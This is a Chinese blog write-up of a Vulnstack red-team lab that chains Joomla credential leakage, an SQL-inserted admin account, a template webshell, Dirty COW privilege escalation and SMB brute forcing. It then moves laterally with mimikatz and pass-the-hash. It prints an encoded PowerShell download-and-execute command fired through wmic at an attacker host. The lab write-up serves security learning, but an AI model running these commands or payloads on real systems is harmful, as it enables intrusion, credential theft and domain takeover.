ATT&CK实战系列-红队评估(三)WP

环境搭建

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试

在这里插入图片描述

渗透流程

0x01 WEB信息收集

查看靶机WEB服务,发现是Joomla CMS搭建的demo站点

在这里插入图片描述



扫描目录得到配置文件的备份configuration.php~

在这里插入图片描述



在其中翻到后端数据库的用户名和密码

在这里插入图片描述



同时端口扫描发现数据库服务可以外联

在这里插入图片描述



尝试用得到的账户密码登录,连接成功

在这里插入图片描述



0x02 添加管理员账户登入后台

尝试破解后台管理员账户,发现不是常规的加密。遂放弃,尝试在官方文档中找到破局的思路。

在这里插入图片描述



访问官网查文档。发现有可以添加管理员的方法

https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F

在这里插入图片描述

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');


这里要注意的是根据官方文档的说法,需要更改后缀为_user的表,但是在数据库中有两个这样的表。。

尝试后发现是am2zu_users表在起作用

在这里插入图片描述



之后使用添加的账号密码成功登录

在这里插入图片描述



0x03 上传WebShell

在 控制栏---->Extensions---->Templates---->Templates 处修改模板,添加一句话木马

在这里插入图片描述

在这里插入图片描述



使用蚁剑连接成功

在这里插入图片描述



0x04 Bypass disable_function&横向移动

在尝试执行命令的时候发现设置了disable_functions

在这里插入图片描述



遂使用蚁剑的bypass_disable_functions插件进行绕过,这里使用的绕过方式是Json Serializer UAF

在这里插入图片描述



一番搜索后在/tmp/mysql/test.txt中发现了可以利用的信息

在这里插入图片描述



一番尝试后,使用该账号密码登上了Centos机器

在这里插入图片描述



0x05 提权

登陆后没有收集到更多有用信息,遂尝试提权。在查看内核版本号后发现该内核受脏牛提权漏洞的影响

在这里插入图片描述



上传exp

在这里插入图片描述



编译执行

在这里插入图片描述



获得root权限

在这里插入图片描述



使用msf的web_delivery模块获得meterpreter

在这里插入图片描述

在这里插入图片描述



0x06 内网横向移动

添加路由并对局域网段进行扫描

P.S. 其实不用添加路由,攻击机本身就有192.168.93.1的地址。但随手就加上了

在这里插入图片描述



使用auxiliary/scanner/smb/smb_version对域内存活的主机和版本号进行然侧

[+] 192.168.93.10:445     -   Host is running Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[*] 192.168.93.20:139     - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[+] 192.168.93.30:445     -   Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)


并尝试使用ms17-010进行横向移动,未果

在这里插入图片描述



只能尝试对SMB模块进行爆破,这里不知道为什么msf和这台机器的连接一直出问题,卡了好久

在这里插入图片描述



最后切到hydra进行爆破,得到口令

在这里插入图片描述



这里使用msf进行hash传递时依旧失败。只能使用exploit/multi/script/web_delivery模块配合wmic进行上线

在这里插入图片描述

wmic /node:192.168.93.20 /user:administrator /password:123qwe!ASD process call create "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABuAHAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbgBwAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbgBwAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADkAMwAuADEAOgA4ADkANwA2AC8AQwB5ADEAcQBPAHQARwBZAEcAMQBCAFoANQA5ADcALwBqAGYAMwAzAGsATgBKAE4AcQB0AEkAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA5ADMALgAxADoAOAA5ADcANgAvAEMAeQAxAHEATwB0AEcAWQBHADEAQgBaADUAOQA3ACcAKQApADsA"


执行成功后即可得到meterpreter

在这里插入图片描述



之后提权,加载mimikatz,导出凭据,可以拿到明文密码

这里需要注意的是,该虚拟机不能关闭,只能暂停,否则重启后域管理员的登录凭据将消失,抓不到了

在这里插入图片描述

在这里插入图片描述



使用明文密码进行PTH操作,拿到域控的Meterpreter

在这里插入图片描述

在这里插入图片描述



对PC机同理,不过该机没有接入域,使用的是拿到的第一个密码

在这里插入图片描述



0x07 拿到Flag

想找flag的话,图形界面会比较方便。所以最后上线了CS,用CS的文件浏览功能寻找flag

在这里插入图片描述



最后在C:\Users\Administrator\Documents下找到了flag.txt

在这里插入图片描述

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值